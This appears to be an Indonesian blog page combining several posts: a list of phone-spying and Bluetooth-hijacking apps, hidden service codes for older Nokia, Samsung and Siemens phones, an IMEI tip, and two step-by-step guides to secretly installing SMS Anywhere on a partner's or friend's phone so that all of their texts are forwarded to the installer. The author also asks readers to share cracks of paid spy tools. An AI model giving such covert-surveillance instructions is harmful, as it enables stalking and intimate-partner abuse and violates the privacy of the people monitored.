Software Penyadap Telpon Istri/Pacar/Suami Bagian Ke III

Terlalu banyak permintaan tentang cara menyadap telpon yang masuk di Hape saya, namun sampai saat ini belum ada yang berhasil karna kebanyakan menggunakan hp berbasis java, namun sebagai penulis tidak henti-hentinya mencari informasi software yang bisa menyadap telpon istri/pacar/suami  yang bisa membuat anda betul-betul bertengkar 100% heheheh,,,kalau putus/cerai gue tidak bertanggung jawab

SOFWARE PENYADAP TELPON ANTARA LAIN

  • 1) Mobile Secuware

Fitur penyadap Mobile Secuware bisa digunain utk memantau pacar aato tmen kita lewat fitur Remote Monitoringvnya. Selaen ntu Aplikasi ini dibekali kemampuan anti maling, jd klo hp ncang2 pd ilang ato di curi, kita bisa tau lewat fasilitas M-Trax (data2 nya pun bisa di selamatin)
aplikasi nya bisa di donlot DISINI

  • 2) Xelnex Lite

Xelnex Lite bisa digunain utk ngerekam pembicaraan ditelpon tanpa didahului bunyi ‘beep’. jd terjaga kerahasiaaan nya,,
sayang nya aplikasi niy masih shareware alias bayar, tp kita bisa nyoba versi trial nya selama 10 hari n’ aplikasi niy kompatibel utk Symbian S60 3rd edition.
klo ada yg mo nyoba donlot aja DISINI

NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..

  • 3) Mobile-Spy

Pengguna hp Symbian S60 udh bisa make layanan pengintip isi hp dr jarak jauh. Dgn layanan ini mereka bisa mengetahui informasi lalu lintas sms dan telpon, yg bisa diakses dr pc ato hp laen lewwat server yg disediain.
selaen Symbian, hp yg berbasis windows Smartphone jg bisa make aplikasi niy…
sayang nya aplikasi niy juga msh trial, klo ada yg mo nyoba donlot DISINI versi trial nya cuman 7 hari

NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..

  • 4) BT Info

Aplikasi yg niy cuman memanfaatkan bluetooth doank, ya jd sama lah kya aplikasi2 laen…
klo ada yg mo nyoba, donlot DISINI
BT Info jg bisa digunain utk ngendaliin semua fungsi hp, kaya nelpon, kamera, alarm, master reset, ampe matiin hp juga bisa.

  • 5) Call Rrecorder dan AGLAYA Call Magic

Fungsi nya cuman utk ngerekam pembicaraan telpon doank,,
klo ada yg mo nyoba, donlot disini aja DISINI <== utk Call Recorder nya DISINI <== utk AGLAYA Call Magic nya

  • 6) TimedSpy

klo pnya hp Symbian S60 v.2 bisa langsung make tnpa alat tambahan,,
fungsi nya utk mengintai orang, jd aplikasi nya melakukan pemotretan trus hasil nya lngsung dikirm gituu…
klo ada yg mo nyoba, donlot DISINI

  • 7) Magic Blue Hack

Aplikasi garapan Humayan Kabir Pavel dan Avishek Ahmed ini, kompatibel utk ponsel Java MIDP 2.0 berBluetooth, Symbian s60, dan PDA.
Fitur yg tersedia yaitu Make Call, Send SMS, Phonebook, Write Ph Book, Answer Call, dan Hang Call.
klo ada yg mo nyoba, download Disini

  • 8) BT Teror

Untuk usil2an, bisa di donlot DISINI
Fungsi nya untuk memanipulasi bluetooth, jd aplikasi nya utk ngirim file2 ke hp target terus2an,, jd kaya flooding gitu deh…
Aplikasi niy harus terintregrasi pula dengan program Python S60 dan Python Script Shell. Utk nge donlot Python nya bisa donlot DISINI

  • 9) Mobiscope beta

Seiring kemajuan teknologi, dengan memanfaatkan jaringan internet kita bisa menikmati layanan video streaming. Jd, nnti nya kita bisa membroadcast pantauan webcam melalui server dari suatu penyedia layanan. Hingga kita bisa dengan mudah mengaksesnya lewat hp, sekalipun jarak kita jauh. Mayoritas ponsel yg beredar di pasaran bisa melakukannya, mengingat sudah dijejali teknologi bearer data (GPRS/3G).
klo ada yg mo nyoba, donlot DISINI
dengan aplikasi ini, kita bisa mengakses webcam lewat hp dengan aman dan nyaman. Menarik nya lg, aplikasi niy dilengkapin fitur sensor gerak dan scheduler, utk merekam situasi pada waktu tertentu.

  • 10) SMS Anywhere

SMS Anywhere fungsi nya nge forward semua sms yg dikirim n’ diterima ponsel target ke ponsel kita.
klo ada yg mo nyoba, donlot DISINI

catatan : jika link error anda bisa cari di mba google

SAMPAI JUMPA LAGI YAH??

Iklan

Kamera Handphone Tembus Pandang

Hasrat manusia yang ingin melihat objek yang tidak terlihat dengan mata telanjang, nampaknya tidak menjadi masalah saat ini. Sebagai contoh yang nyata, hobi menonton film dapat menjadi kesempatan untuk memenuhi hasrat manusia yang ingin mengintip kehidupan orang lain.

Oleh karenanya, dunia ilmiah terus melakukan petualangan untuk menuntaskan tuntutan hidup manusia itu melalui pengembangan peralatanyang dapat tembus pandang. Korea Selatan baru-baru ini berhasil mengembangkan kamera tembus pandang yang dapat menerobos baik bagian dalam baju maupun obyek di dalam kabut. Pengembangan kamera gelombang milimeter untuk yang ke-dua kalinya di dunia

Suatu lembaga riset Korea Selatan pada tanggal 19 Oktober lalu di kota Yongin, propinsi Kyeonggi, menyelenggarakan presentasi tentang kemampuan MIRAE, Milimeter-Wave Imaging Radiometer Equipment, atau sejenis kamerayang mampu mendeteksi gelombang milimeter sehingga tembus pandang.

Kode Rahasia HP Nokia

Ini dia Code-code rahasia Handphone merek NOKIA yang bisa kamu pake
Untuk mengetahui kode akses (informasi) tersembunyi,tekanlah kode akses di bawah ini dan diikuti tekan”CALL” (biasanya bergambar gagang telepon hijau)

1. KODE AKSES NOKIA

*

*#30#Menampilkan ‘private number’ yg menghubungi Anda
*

*#73# Mereset timer ponsel dan skor game (pd bbrp ponsel)
*

*#7780# Mengembalikan ke setting pabrik (factory setting)
*

*#2820# Alamat IP perangkat Bluetooth (hanya utk yg memiliki fitur Bluetooth)
*

xx# Akses cepat ke nama/nomor telepon di phonebook ponsel misal 20#Tombol OFF Menekan dg singkat, utk berpindah antar profile
*

*3370# Mengaktifkan ENHANCED FULL RATE Codec (EFR). Ponsel Nokia Anda akan memakai kualitas suara terbaik, namun fitur ini memerlukan energi lebih shg sedikit menguras daya baterai. Catatan: kode ini tidak berlaku di ponsel2 Symbian.
*

#3370# Menonaktifkan Enhanced Full Rate Codec (EFR)
*

*#4720# Mengaktifkan Hall Rate Codec. Ponsel Nokia Anda akan menggunakan kualitas suara lebih rendah shg bisa menghemat energi baterai sekitar 30%
*

#4720# Menonaktifkan Half Rate Codec
*

*#0000# Menampilkan versi software ponsel. Baris pertama menunjukkan versi software, baris kedua menunjukkan tgl pembuatan software, baris ketiga menunjukkan tipe kompresi yg digunakan.
*

*#9999# Kode alternatif jika *#0000# tidak bekerja
*

*#06# Melihat nomor international Mobile Equipment Identity (nomor IMEI)
*

*#21# Mengecek nomor panggilan “All Calls” yg digunakan
*

*#2640# Menampilkan kode keamanan ponsel yg digunakan (bila masih menggunakan standard kode tidak akan terlihat)
*

*#43# Mengecek status “Call Waiting”
*

*#61# Untuk mengecek nomor pemanggil yg dialihkan ketika tak Anda jawab (Jika Anda mengaktifkan Call Divert/pengalihan panggilan)
*

*#62# Mengecek nomor pemanggil yg dialihkan ketika ponsel Anda di luar jangkauan (jika Anda mengaktifkan Call Divert/pengalihan panggilan)
*

*#67# Mengecek nomor pemanggil yg dialihkan ketika ponsel Anda sedang sibuk (Jika Anda mengaktifkan call Divert/pengalihan panggilan)
*

**21*number# Menghidupkan pengalihan “All Calls” pada nomor yg diisi
*

**61*number# Menghidupkan pengalihan “No Reply” pada nomor yg diisi
*

**67*number# Menghidupkan pengalihan “On Busy” pada nomor yg diisi
*

*#67705646# Mengganti Logo Operator Logo pada Nokia 3310 dan 3330
*

*#746025625# Menampilkan status SIM Clock. Jika ponsel Anda mendukung fitur penghemat energi akan keluar tulisan “Sim Clock Stop Allowed”, artinya Anda akan mendapatkan waktu standby yg lebih panjang.
*

*#7760# Menampilkan kode pabrikan (utk sebagian besar ponsel tipe lama)
*

*#92702689# Memunculkan: 1.Serial Number (IMEI), 2.Date Made (tgl pembuatan), 3.Purchase Date (tgl pembelian), 4. Date of last repair (tgl terakhir perbaikan / 0000 utk yg belum pernah diperbaiki). 5. Transfer User Data. Di bbrp ponsel, untuk keluar dari mode ini Anda harus merestar
*

ponsel.

Update Tambahan Nokia GSM
Nokia 21xx
Kode Penjelasan

*

*#06# Kode IMEI

*

*#3283# Minggu Produksi/Bulan & Tahun

*

*#9999# Versi Software

Nokia 32xx
Kode Penjelasan

*

*#06# Kode IMEI

*

*#0000# Versi Software

*

*#92702689# Menu Layanan

*

*#746025625# Sim Clock Stop

*

*3370# EFR aktif, suara lebih jernih, baterai cepat habis.

*

#3370# EFR inactive.

*

*4720# HR aktif, suara tidak lebih jernih, baterai tahan lama.

*

#4720# HR OFF.

Nokia 51xx
Kode Penjelasan

*

*#06# Kode IMEI

*

*#0000# Versi Software

*

*#92702689# Menu layanan

*

*3370# EFR aktif, suara lebih jernih, baterai cepat habis.

*

#3370# EFR inactive.

*

*4720# HR aktif, suara tidak lebih jernih, baterai tahan lama.

*

#4720# HR OFF.

Nokia 61xx
Kode Penjelasan

*

*#06# Kode IMEI

*

*#0000# Versi Software

*

*#92702689# Menu layanan

*

*3370# EFR aktif, suara lebih jernih, baterai cepat habis.

*

#3370# EFR inactive.

Nokia 81xx
Kode Penjelasan

*

*#06# Kode IMEI

*

*#8110# Versi Software, tanggal produksi & nomor model

*

*#92702689# Menu layanan

Nokia 88xx
Kode Penjelasan

*

*#06# Kode IMEI

*

*#0000# Versi Software

*

*#92702689# Menu Layanan

*

*3370# EFR aktif, suara lebih jernih, baterai cepat habis.

*

#3370# EFR inactive.

Nokia 90xx
Kode Penjelasan

*

*#06# Kode IMEI

*

*#6823711

*

58412125# Versi Software

*

*#3283# Tanggal Produksi

2. KODE AKSES SONY ERICSSON

*

Melihat IMEI (International Mobile Equipment Identity) Caranya tekan * # 0 6 #

*

Merubah bahasa menjadi bahasa inggris / english Caranya tekan * # 0 0 0 0 #

*

Mengunci sim card agar tidak bisa mengganti simcard Caranya tekan < * * <>

*

Melihat service menu dan versi software ponsel sony ericsson Caranya tekan > * < < * < *Tambahan : kode diinput tanpa spasi 3. KODE AKSES SAMSUNG * IMEI number: * # 0 6 # * Software version: * # 9 9 9 9 # or * # 0 8 3 7 # * Net Monitor: * # 0 3 2 4 # * Memory reset (removes SIMLOCK!!!): *2767*3855# (works only on older versions) * Memory reset CUSTOM: *2767*2878# (works only on older versions) * Change dispplay contrast: * # 0 5 2 3 # * Memory info: * # 0 3 7 7 # or * # 0 2 4 6 # * Battery status: * # 9 9 9 8 * 2 2 8 # * Change sound of alarm: *#9998*289# * Vibra test: *#9998*842# 4. KODE AKSES SIEMENS S6, S8: If you add to phonebook under ‘own phone number’ +12022243121 with namez (for example MMI), then you will see something 🙂 S10, E10: In phonebook enter +12022243121 as your own phone no. You will see a picture with sun, two palms and greetings. S15e: * Monitor Mode: Code: *#7436267*8378# (*#SIEMENS*TEST#) Hold red phone button until it code disapears.Menu 3.3.4 Choose frequency. Menu 3.3.4.1 Automaticaly. Menu 3.3.4.2 Choose GSM-900 Menu 3.3.4.3 Choose GSM-1800 S25: * Enhanced Full Rate *#3370# turns on #3370# turns off * Haft Rate Mode *#4720# turns on #4720# turns off. * Languages: *#0000#+green phone – choose automaticaly *#0001#+green phone – English *#0030#+green phone – Greek *#0031#+green phone – Netherlands *#0032#+green phone – French *#0034#+green phone – Spanish *#0039#+green phone – Italian *#0049#+green phone – German *#0090#+green phone – Turkish * Mengubah PIN2? **04*old PIN2*new PIN2*new PIN2# C25: * Languages: *#0000#+green phone – choose automaticaly *#0001#+green phone – English *#0030#+green phone – Greek *#0031#+green phone – Netherlands *#0032#+green phone – French *#0034#+green phone – Spanish *#0039#+green phone – Italian *#0049#+green phone – German *#0090#+green phone – Turkish * mengubah PIN: **04*old PIN*new PIN*new PIN# Demikian trik dari saya, selamat mencoba …

Tips Trik Rahasia Menyadap Hp dan SMS Teman/Pacar/Istri/Suami BAGIAN II

spy-phonesKayaknya sekarang yang masih banyak di cari para pengguna ponsel adalah tips menyadap ponsel. Ada beberapa orang yang langsung tanya kepada saya, ada juga yang mengisi coment di blog ini yang menanyakan bagaimana cara menyadap ponsel (sms dan telepon)?
Baiklah, pada postingan yang lalu saya pernah menpostingkan cara menyadap ponsel juga tips antisadap ponsel tersebut.
Kali ini ada tips lagi untuk menyadap sms.
Sebenarnya ini cara jitu buat kamu yang kerepotan menangani SMS dalam dua ponsel atau lebih. Dengan sms Anywhere v1.0, setiap sms yang masuk dan terkirim akan diteruskan keponsel lain secara otomatis.
Namun, tips ini berkembang menjadi alat/sarana untuk menyadap setiap pesan sms.
Caranya sebagai berikut :

Unduh dan Instal
Download aplikasi SMS Anywhere v1.0 File bernama smsanywherelite.sis akan tersimpan di PC. Trus transfer aplikasi tersebut menggunakan koneksi yang tersedia (bluetooth, inframerah, kabel data) kemudian instal.

Aktifkan dan Siapkan Password
Aplikasi SMS Anywhere belum mendukung GUI (Graphics User Interface). Artinya, setelah instalasi selesai, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Jadi takkan menaruh curiga kan?
Kembali lagi, caranya siapkan satu ponsel yang nantinya kamu jadikan ponsel utama dalam hal ini adalah ponsel sang target/pacar/selingkuhanmu. Setiap sms masuk ataupun keluar dari ponsel utama otomatis akan diteruskan ke ponsel kedua/ponselmu.
Aktifkan program ini di ponsel utama dengan mengetik sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.

Meneruskan SMS
Aktifkan setelan di ponsel target agar program ini bisa langsung meneruskan setiap sms di ponsel tersebut ke ponselmu. Untuk meneruskan setiap sms masuk, aktifkan fungsi ini dengan mengirim sms bertuliskan SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0.

Silahkan mencoba sendiri

HP ANDA BUATAN MANA?

Memasuki era perdagangan bebas kita haruslah berhati-hati dalam membeli sesuatu, terutama barang-barang elektronik, hp khususnya karena sekarang banyak sekali penipuan atau bermunculannya hp-hp black market ataupun mungkin juga hp rekondisi, oleh karena itu diperlukan tips untuk mengetahui apakah hp sebuah hp itu benar-benar asli, dibuat dinegara mana dan tentu saja paling penting adalah kualitasnya. Berikut ini sedikit tips untuk mengetahui dinegara mana sebuah hp dibuat serta kualitasnya (hanya hp GSM bukan CDMA) 

Langkah pertama : cari no imei hp dgn ketik *#06#

Setelah kamu mengetikan code tersebut maka akan muncul 15 angka no seri contoh : 434566106789435.

Jika angka no tujuh dan delapan adalah angka 02 atau 20 itu berarti hp tersebut dibuat di Asia dengan kualitas yang jelek.

Jika angka no tujuh dan delapan adalah angka 08 atau 80 itu berart hp tersebut dibuat Jerman dengan kualitas lumayan.

Jika angka no tujuh dan delapan adalah angka 01 atau 10 itu berarti hp tersebut dibuat di Finlandia dengan kualitas bagus.

Jika angka no tujuh dan delapan adalah angka 00 itu berarti hp tersebut dibuat di Perancis dengan kualitas paling baik.

Dan apabila nggak ada dari salah satu diatas, berarti hp anda bodong alias gak jelas.

Demikian sedikit tip, semoga bisa membantu agar tidak tertipu.

Lacak Nomor yang suka iseng

Anda pernah menerima dijahili oleh orang dan nomernya tidak di kenal ?

Anda pernah menerima sms dan nomernya tidak dikenal ?

Anda Pernah di Telephone orang dan tidak kenal nomernya ??

Saya yakin kita semua pernah mengalami hal tersebut. Sebenarnya si bisa saja kita telp atau sms balik ke nomer tersebut, cuma terkadang kita malu untuk bertanya : Ini siapa ya?? darimana?? Ko Tiba2 telp?

Tar bisa bisa dikira kita sombong atau pelupa.

Sekarang anda jangan khawatir, ada sebuah tool yang bisa mengecek lokasi nomer handphone dengan bantuan HLR Lookup program ini bisa mencari lokasi berdasarkan No Handphone. Untuk Sementara program ini cuma bisa di pake buat Simpati dan kartu As, Untuk operator yang lainya masih dalam proses pengembangan. jadi di tunggu aja.

Caranya klik HLR Lookup silahkan masukan Nomer Handphone yang ingin di lacak, trus klik tombol search

Jadi buat Temen temen yang hobi ngejahilin orang sekarang hati hati yah

Tips Trik Rahasia Menyadap Hp dan SMS Teman/Pacar/Istri/Suami dll

hpSsaya akan memberikan anda beberapa tips trik rahasia untuk menyadap sms nomer teman anda. Biasanya, trik ini digunakan para detektif tuk mensadap HP seseorang. Baik itu SMS maupun Telepon. ( kok saya bisa tahu trik ini?) Tetapi saya hanya akan menjelaskan kepada anda cara menyadap sms. Menakutkan bila menyadap/sadap telepon. Artikel ini hanya sebagai hiburan saja. Jangan memakainya dengan maksud jahat karena perbuatan dosa anda akan sangat besar. Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. Kalo saya se..buat adek saya aja, soalnya dia nakal dan suka boong lwt sms. Anda mau tahu kan caranya? setelah anda tahu rahasia ini, anda wajib komentar lo!

Tentu saja ada persyaratan yg harus dipenuhi :

  1. Dilarang Memakai ini untuk perbuatan lainnya kecuali untuk hiburan
  2. HP adalah HP symbian.  Baik HP anda maupun HP teman anda.
  3. Merek NOKIA
  4. Memiliki aplikasi simbyan (smsanywherelite.sis)

Nah..persyaratan itu harus anda lakukan sebelum anda mensadap sms. Hp anda harus symbian dan nokia ( kalo bisa). dan hp teman anda yang akan disadap juga symbian dan nokia. (promosi nokia ni). Kalo ga punya nokia, jangan teruskan baca artikel ini karena besar kemungkinan akan gagal. Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :

  1. Masukkan aplikasi symbian itu di HP anda dan teman anda
  2. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
  3. Siapkan hp/ponsel korban anda
  4. Siapkan HP anda yang akan menerima sms masuk dari korban anda.
  5. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
  6. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
  7. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya

Dengan begini, kita akan tahu mana pacar kita yang selingkuh..mana teman yang berkhianat dan lainnya. Semoga bermanfaat!

Mau Softwarenya :  Silahkan Hubungi 085255xxxxxx 100% dijamin bakal bertengkar

download-icon1

Silahkan Download Disini